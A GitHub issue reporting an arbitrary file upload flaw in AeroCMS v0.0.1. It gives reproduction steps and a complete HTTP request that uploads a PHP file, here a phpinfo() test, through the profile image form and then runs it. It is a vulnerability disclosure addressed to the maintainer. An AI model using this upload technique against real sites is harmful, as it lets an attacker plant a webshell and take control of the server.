search

MegaTKC / AeroCMS

Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications!
GNU General Public License v2.0
23 stars 6 forks source link

An arbitrary file upload vulnerability was found #3

Open Zoe0427 opened 2 years ago

Zoe0427 commented 2 years ago

Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.

Step to Reproduct

After entering the background of website management, click "Profile" to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists. image

We create a new webshell file and name it shell.php :

<?php phpinfo(); ?>

Next, we select the file and click "Updae Profile" to upload the file image

When upload success access '/images/shell.php'

image

We can see that the file was successfully uploaded and executed

Vulnerable Code

upfile

No file checking before uploading

POC

Injection Point

-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_image"; filename="shell.php" Content-Type: image/jpeg

Request

POST /admin/profile.php HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050 Content-Length: 1109 Origin: http://127.0.0.1:8080 Connection: close Referer: http://127.0.0.1:8080/admin/profile.php Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3 Upgrade-Insecure-Requests: 1

-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="username"

1111 -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="password"

123.com -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_firstname"

-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_lastname"

-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_email"

-----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_image"; filename="shell.php" Content-Type: image/jpeg

test is test

<?php phpinfo();?> -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="user_role"

Subscriber -----------------------------423983190532431556521178267050 Content-Disposition: form-data; name="update_user"

Update Profile -----------------------------423983190532431556521178267050--

response

HTTP/1.1 200 OK Date: Wed, 10 Aug 2022 02:45:01 GMT Server: Apache/2.4.10 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 8474 Connection: close Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>

AeroCMS Admin Panel

Welcome to the Admin Panel, !

I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply